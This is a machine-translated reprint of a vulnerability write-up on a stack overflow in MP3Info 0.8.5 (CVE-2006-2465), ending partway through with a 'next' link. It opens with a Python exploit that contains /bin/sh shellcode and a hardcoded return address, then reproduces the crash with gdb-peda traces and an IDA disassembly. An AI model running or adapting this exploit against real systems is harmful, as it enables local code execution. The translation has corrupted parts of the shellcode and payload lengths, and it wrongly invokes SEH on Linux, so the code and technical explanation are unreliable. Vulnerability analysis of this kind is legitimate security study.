Linux vulnerability analysis-MP3Info 0.8.5 a code execution vulnerability, CVE-2006-2465-a vulnerability warning-the black bar safety net

ID MYHACK58:62201783971
Type myhack58
Reporter 佚名
Modified 2017-03-05T00:00:00


Author: k0shl reprint please indicate the source:

Vulnerability description

Software download:


junk = "\x90\x90\x90\x90"8 shellcode = "\x31\xc0\x50\x68/\x68/bin\x89\the XE3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" buffer = "\x90\x90\x90\x90"89 eip = "\x10\xf0\xff\xbf"

print "# MP3info is prone to a Stack-BoF" print "# Wasting CPU clocks on unusable exploits" print "# This is exploit is for educational purposes"

try: subprocess. call(["mp3info", junk+shellcode+buffer+eip]) except OSError as e: if e. errno == os. errno. ENOENT: print "MP3Info not found!" else: print "Error executing exploit" raise

Test environment:

Kali 2.0

This vulnerability is a local code execution vulnerability, poc mean in fact, is called mp3info, a command line incoming malformations string, you can directly use$python-c method incoming malformations string you can also. With gdb open, and then run $python-c + deformity of the string you can directly reach the vulnerability scene, this is my debug of the first Linux vulnerability, the vulnerability basis of comparison, the representative.

This vulnerability is my first post to linux analysis, hereby Memorial! GET a lot of new linux debugging method, very rewarding.

Vulnerability reproduction

This vulnerability does not like the details described above, but in the process the MP3 path, since the path is not read, and proceeds to error handling process, errors of the file path passed as the error information of the incoming linux's perror()function, in the process the error occurred, into the SEH exception function, and then by overwriting the SEH pointer arbitrary code execution. The following of this vulnerability for detailed analysis.

First of all we need under linux to compile MP3Info, you need to download a dependency of the header file libncurses5-dev,after the installation you can compile MP3Info and, after compilation, we do not use poc, the direct use of the python input malformation string.

root@root:~/Desktop/mp3info-0.8.5 a -#. / mp3info $(python-c 'print "\x41"100') Error opening MP3: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: No such file or directory root@root:~/Desktop/mp3info-0.8.5 a -#. / mp3info $(python-c 'print "\x41"700') Segmentation fault

You can see that when the deformity of the string length reaches 700 when prompted Segmentation fault, that is, pointer errors, or the occurrence of a buffer overflow. We used gdb-peda's look at the time of the crash information.

The first is the crash point.

[-------------------------------------code-------------------------------------] 0xb7e067cb <__GI_getenv+107>: mov esi,DWORD PTR [ebp+0x0] 0xb7e067ce <__GI_getenv+110>: test esi,esi 0xb7e067d0 <__GI_getenv+112>: je 0xb7e0682a <__GI_getenv+202> => 0xb7e067d2 <__GI_getenv+114>: cmp di,WORD PTR [esi]

You can see that in cmp the comparison statement when an error occurs, the basic can be judged esi register is Non-readable addresses.

[----------------------------------registers-----------------------------------] EAX: 0x6 EBX: 0xb7f7c000 --> 0x1a5da8 ECX: 0x414c ('LA') EDX: 0xffbab8be ESI: 0x41414141 ('AAAA')

You can see the ESI value is really unreadable address 41414141, so we are now back stack calls.

gdb-peda$ bt

0 __GI_getenv (name=0xb7f32ff5 "NGUAGE", name@entry=0xb7f32ff3 "LANGUAGE")

at getenv. c:85

1 0xb7dff10e in guess_category_value (

categoryname=0xb7f1c953 <_nl_category_names+51> "LC_MESSAGES", category=<optimized out>) at dcigettext. c:1356

2 __dcigettext (

domainname=domainname@entry=0xb7f32fae <_libc_intl_domainname> "libc", msgid1=msgid1@entry=0xb7f336a5 "File name too long", msgid2=msgid2@entry=0x0, plural=plural@entry=0x0, n=n@entry=0x0, category=category@entry=0x5) at dcigettext. c:561

3 0xb7dfe1f3 in __GI___dcgettext (

domainname=0xb7f32fae <_libc_intl_domainname> "libc", msgid=0xb7f336a5 "File name too long", category=category@entry=0x5) at dcgettext. c:52

4 0xb7e4ff2f in __GI___strerror_r (errnum=errnum@entry=0x24,

buf=buf@entry=0xbfffea20"@\360\377\267", buflen=buflen@entry=0x400) at _strerror. c:71

5 0xb7e36257 in perror_internal (fp=fp@entry=0x804f008,

s=s@entry=0xbffff040 "Error opening MP3: ", 'A' <installed or support 181 times>..., errnum=errnum@entry=0x24) at perror. c:37

6 0xb7e3633e in __GI_perror (

s=0xbffff040 "Error opening MP3: ", 'A' <installed or support 181 times>...) at perror. c:74

7 0x08049597 in main (

argc=<error reading variable: Cannot access memory at address 0x41414141>, argv=<error reading variable: Cannot access memory at address 0x41414145>) at mp3info. c:195 Backtrace stopped: previous frame inner to this frame (corrupt stack?)

Our main view 0x08049597 the location of the call, because after it enters the system function, then we from 0x08049597 this starting position, for analysis.

Vulnerability analysis

Through the ida open the elf file, we look at 0x08049597 at the call.

loc_804957B: fp = eax; FILE * lea edi, [ebp+error_msg] fp = edx ; FILE * push eax push dword ptr [esi] push offset aErrorOpeningMp ; "Error opening MP3: %s" push edi ; s call _sprintf mov [esp], edi ; s call _perror

[1] [2] next